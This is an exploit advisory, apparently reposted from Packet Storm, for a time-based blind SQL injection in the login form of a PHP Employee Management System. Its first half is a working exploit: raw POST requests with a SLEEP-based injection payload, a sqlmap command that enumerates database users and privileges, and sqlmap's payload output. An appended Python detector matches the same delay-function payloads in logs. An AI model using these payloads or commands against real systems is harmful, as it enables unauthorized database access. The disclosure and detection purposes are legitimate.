## https://sploitus.com/exploit?id=PACKETSTORM:176685
# Exploit Title: Employee Management System - SQLi  
# Date: 23/03/2024  
# Exploit Author: Özlem Balcı  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Software Download: https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL  
# Version: 1.0  
# Tested on: Mac OS  
  
## Description  
A time-based blind SQL injection vulnerability in the login page  
(/employee_akpoly/Account/login.php) of Employee Management System allows  
remote, unauthenticated attackers to execute arbitrary SQL commands through  
the "txtemail" parameter.  
  
## Request PoC  
  
POST /employee_akpoly/Account/login.php HTTP/1.1  
Host: localhost  
Content-Length: 55  
Cache-Control: max-age=0  
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/employee_akpoly/Account/login.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf  
Connection: close  
  
txtemail=test%40test.com&txtpassword=12345A&E&btnlogin=  
  
This request causes an error. Appending ' AND (SELECT 2092 FROM  
(SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the  
"txtemail" parameter, the response was a 302 status code with the message  
Found, but it arrived 11 seconds later, which indicates that our SLEEP(11)  
command was executed.  
  
POST /employee_akpoly/Account/login.php HTTP/1.1  
Host: localhost  
Content-Length: 117  
Cache-Control: max-age=0  
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/employee_akpoly/Account/login.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf  
Connection: close  
  
txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin  
  
  
sqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users --privileges --role  
  
Parameter: txtemail (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=  
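As an added defensive example (not part of the advisory), the following Python script spots the behaviour described above from the server side: POSTs to the login endpoint that return the normal 302 but arrive seconds late, and captured form bodies that call a database delay function. The log format, addresses and timings are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx-style access log lines (not from the advisory); the assumed
# format is the combined log with $request_time in seconds as the last field.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Mar/2024:10:00:01 +0300] "POST /employee_akpoly/Account/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" 0.031
10.0.0.5 - - [23/Mar/2024:10:00:05 +0300] "POST /employee_akpoly/Account/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" 0.028
10.0.0.5 - - [23/Mar/2024:10:00:09 +0300] "GET /employee_akpoly/Account/login.php HTTP/1.1" 200 2150 "-" "Mozilla/5.0" 0.012
10.0.0.9 - - [23/Mar/2024:10:00:20 +0300] "POST /employee_akpoly/Account/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" 11.044
10.0.0.9 - - [23/Mar/2024:10:00:35 +0300] "POST /employee_akpoly/Account/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" 5.039
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$'
)
# Delay primitives a time-based blind probe relies on (MySQL SLEEP/BENCHMARK,
# PostgreSQL pg_sleep, MSSQL WAITFOR DELAY); matched after URL-decoding.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)


def parse_log(text):
    """Parse matching lines into dicts with request_time as float; skip the rest."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append(dict(m.groupdict(), rt=float(m.group("rt"))))
    return rows


def find_slow_login_posts(text, path="/employee_akpoly/Account/login.php", min_delay=3.0):
    """Flag POSTs to `path` that took at least `min_delay` seconds longer than the
    fastest POST seen for it. A time-based blind probe gets the normal response
    (302 Found here) and differs only in timing, so the delay rounded to whole
    seconds is reported: it approximates the SLEEP(n) value that was injected."""
    posts = [r for r in parse_log(text) if r["method"] == "POST" and r["path"] == path]
    if not posts:
        return []
    baseline = min(r["rt"] for r in posts)
    return [(r["ts"], r["ip"], r["status"], round(r["rt"] - baseline))
            for r in posts if r["rt"] - baseline >= min_delay]


def body_has_delay_primitive(body):
    """True if a captured form body (e.g. from a WAF audit log) calls a delay function."""
    return DELAY_RE.search(unquote_plus(body)) is not None
```

Access logs alone do not contain POST bodies, so the body check is meant for a WAF or application audit log; the latency check needs only the web server's request time.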